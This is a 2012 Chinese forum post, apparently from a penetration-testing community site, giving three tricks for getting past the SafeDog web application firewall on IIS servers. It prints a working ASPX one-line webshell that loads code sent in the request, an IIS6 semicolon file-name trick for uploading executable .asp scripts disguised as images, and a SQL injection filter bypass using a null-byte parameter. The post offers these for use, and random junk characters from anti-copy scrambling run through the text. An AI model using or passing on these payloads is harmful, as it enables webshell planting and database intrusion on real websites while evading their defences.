中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]

作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。* n2 Z5 `- G& Y# T: c. y; \
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。: J$ j: U* c+ I/ T' s
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。4 e* a! ^& c( G' P7 \! N1 O$ r% O+ |
1 t/ m% R- P& J( u; Q4 a
2、IIS6.0解析漏洞遇到安全狗。- q( |8 C# f4 `" n
文件名为/ |+ F  U$ q! ^. K
http://www.xxxxx.com/sh3llc0de.asp;1.jpg* _3 b6 f  H4 o4 t/ x1 I

/ ]) O! o8 F3 S7 @* H! S0 n. h. G这样的会被IIS安全狗果断屏蔽。
% t0 ?) a' b: H) f9 `& H改成如下名称,IIS6一样会解析:, x$ Z/ t1 s) ~" H  F+ t/ z3 C" @/ j
www.xxxxx.com/;1.asp;1.jpg
( j$ d$ n& b2 ]7 `& q8 p: _
- `8 T* a6 t3 w& c- |/ k- Z( k+ Y" Q# u3、安全狗的注入绕过。9 M9 D# }' _) Z
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。  h/ a& ^2 s# k0 ?2 `+ T
但如果:& Z4 m2 i. |/ P4 x, L& D, W" t7 {* P
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=16 o! I( W% ~& T2 F+ J7 b; K  H. _1 a
就可以成功绕过了。. k, i  D; M- ]' Q: o' P" g1 r& b. S

3 f" J$ M/ L3 ?  D' C; s; R% a* ?
$ N6 }3 W" y1 O% h$ }! x- }9 K




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2